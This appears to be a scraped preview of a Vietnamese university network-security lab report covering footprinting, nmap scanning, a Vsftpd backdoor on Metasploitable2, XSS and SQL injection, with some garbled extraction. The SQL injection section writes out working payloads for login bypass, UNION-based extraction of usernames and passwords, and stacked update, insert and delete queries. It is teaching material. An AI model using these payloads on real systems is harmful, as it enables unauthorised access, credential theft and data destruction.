Báo cáo thực hành an toàn mạng bài thực hành số 2

42 2 0
Báo cáo thực hành an toàn mạng bài thực hành số 2

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG BÁO CÁO THỰC HÀNH AN TOÀN MẠNG BÀI THỰC HÀNH SỐ Giảng viên hướng dẫn: TS Đặng Minh Tuấn MỤC LỤC BÀI 1: FOOTPRINT BÀI 2: SCANNING BÀI 3: SYSTEM HACKING 21 BÀI 4: TROJAN VÀ BACKDOOR 23 BÀI 5: CÁC PHƯƠNG PHÁP SNIFFER 24 BÀI 6: TẤN CÔNG TỪ CHỐI DỊCH VỤ DOS 25 BÀI 7: SOCIAL ENGINEERING 25 BÀI 8: HACKING WEB SERVER 27 BÀI 9: WEB APPLICATION HACKING 28 BÀI 10: SQL INJECTION 29 BÀI 11: BUFFER OVERFLOW 39 BÀI 1: FOOTPRINT I Tìm thơng tin domain - Tìm kiếm thơng tin domain itvietnam.com sử dụng trang web https://who.is/ - Tra cứu thông tin domain google.com sử dụng trang web https://whois.domaintools.com/ II Tìm thơng tin email - Sử dụng phần mềm 1st Email Address Spider (trang chủ: http://www.123hiddensender.com) - Keyword: vnn.vn BÀI 2: SCANNING I Sử dụng phần mềm nmap - Lấy thông tin từ máy từ xa xác định hệ điều hành máy • nmap -sS -P0 -sV -O Lấy danh sách máy chủ với cổng mở định nghĩa trước • nmap -p 135 -oG – 192.168.1.5 • nmap -p 445 -oG – 192.168.1.5 BÀI 8: HACKING WEB SERVER - Cấu hình mạng máy victim (Metasploitable2) - Cấu hình mạng máy Kali Linux - Khai thác backdoor Vsftpd v2.3.4 (port 6200) 27 BÀI 9: WEB APPLICATION HACKING XSS Stored 28 BÀI 10: SQL INJECTION Vượt qua khâu xác thực người dùng - Chi tiết file login_error.txt 29 - Nhập liệu cho phép đăng nhập mà khơng cần có đủ username password: o Đăng nhập tự 30 o Đăng nhập vào tài khoản người dùng định o Phân tích câu lệnh SQL thực (hiển thị trang) giải thích kết có  Câu lệnh lấy ghi bảng tbl_users với username = ‘aaaa’ or 1=1 –’ password = ‘today’ Kết đăng nhập thành công với tài khoản người dùng danh sách 31  Câu lệnh lấy ghi bảng tbl_users với username = ‘david –’ password = ‘today’ Kết đăng nhập thành công với tài khoản người dùng david tồn tài khoản với user Trích xuất liệu từ CSDL - Chi tiết file search_error.txt - Tìm số trường câu truy vấn trang o sam%’ order by ; 32 o sam%’ union select ; - Hiển thị thông tin hệ quản trị CSDL hệ điều hành o ssss' union select '', @@version, 33 - Trích xuất danh sách bảng CSDL o ssss' union select '', name, from sys.objects where type='u'; - Trích xuất danh sách trường bảng o ssss' union select '', a.name, from sys.columns a inner join sys.objects b on a.object_id = b.object_id where b.name='tbl_users'; 34 o Thay tên bảng tbl_users bảng khác có mục để hiển thị danh sách trường bảng 35 - Trích xuất liệu bảng o ssss' union select full_name, username+'-'+password, from tbl_users; 36 o Thay tên bảng danh sách trường để trích xuất liệu bảng khác có mục o Trích xuất ghi gồm tất trường từ bảng students có mã sinh viên trùng với mã sv hiển thị tồn thơng tin trích xuất lên hình 37 Thêm, sửa, xố liệu - samsung'; update tbl_users set password='lostmypassword' where username='david'; - samsung'; insert into tbl_users (full_name, username, password) values ('GiantB', 'giant_bee', 'conongratto'); 38 - samsung'; delete from tbl_users where username = 'giant_bee'; BÀI 11: BUFFER OVERFLOW 39 40 41 ...MỤC LỤC BÀI 1: FOOTPRINT BÀI 2: SCANNING BÀI 3: SYSTEM HACKING 21 BÀI 4: TROJAN VÀ BACKDOOR 23 BÀI 5: CÁC PHƯƠNG PHÁP SNIFFER 24 BÀI 6:... VỤ DOS 25 BÀI 7: SOCIAL ENGINEERING 25 BÀI 8: HACKING WEB SERVER 27 BÀI 9: WEB APPLICATION HACKING 28 BÀI 10: SQL INJECTION 29 BÀI 11: BUFFER... 20 BÀI 3: SYSTEM HACKING 21 Dùng Cain để brute-force mật 22 BÀI 4: TROJAN VÀ BACKDOOR Sử dụng netcat để kết nối shell 23 BÀI 5: CÁC PHƯƠNG PHÁP SNIFFER Sử dụng Etercap để công ARP Poisoning 24

Ngày đăng: 26/02/2023, 17:23